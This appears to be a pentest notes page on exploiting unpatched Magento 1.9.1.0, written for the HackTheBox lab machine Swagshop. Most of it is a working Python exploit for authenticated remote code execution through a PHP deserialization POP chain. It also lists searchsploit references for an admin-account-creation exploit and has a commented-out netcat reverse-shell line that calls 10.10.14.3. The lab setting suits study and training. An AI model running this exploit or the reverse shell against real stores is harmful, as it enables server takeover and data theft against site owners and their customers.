Magento

Magento is an ecommerce website which allows users to create and showcase their products
Enumeration
The magescan is an automated tool which is like wpscan checks for basic config locations - here​
php magescan.phar scan:all http://swagshop.htb
Exploits
When the magento is not patched with SUPEE-5344 and of the version 1.9.1.0 CE / 1.14.1.0 EE (which will be enumerated by megascan)
We can perform remote code execution
searchsploit -x 37977
The exploit creates a admin account in the megento application which we can use it to perform RCE as authenticated user
searchsploit -x 37811 
The python3 version of 37811 is below and worked fine for swagshop htb
#!/usr/bin/env python3
​
from hashlib import md5
import sys 
import re
import base64
import requests
from pwn import log
​
username = "forme"
password = "forme"
url = "http://swagshop.htb/index.php/admin"
proxy = {"http" :"http://localhost:8080"}
data = {"login[username]" : username,
		"login[password]" : password}
​
#arg = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f'
arg = "whoami"
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml
​
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# session
log.info("Initializing the session")
session = requests.Session()
​
# Loign Successful
r = session.post(url=url, data=data, proxies=proxy)
if r.status_code == 200:
	log.success("Logged in as admin...")
else:
	log.error("Failed to login")
​
burl = re.search("ajaxBlockUrl = \'(.*)\'", r.text)
burl = burl.group(1)
# print(burl) # identifies block url and key
key = re.search("var FORM_KEY = '(.*)'", r.text)
key = key.group(1)
# print(key)
log.info("Identified block url and key")
​
dn = session.get(burl + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", dn.text)
tunnel = bytes(tunnel.group(1), 'utf-8')
​
payload = base64.b64encode(bytes(payload, 'utf-8'))
gh = bytes(md5(payload + install_date).hexdigest(), 'utf-8')
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh
log.info("Exploit constructed")
test_ = exploit.decode()
test = session.get(url=test_)
log.success("Successfully exploited...")
print(test.text)
Machine:
Swagshop - HTB
Wordpress
Bludit
Last modified 1yr ago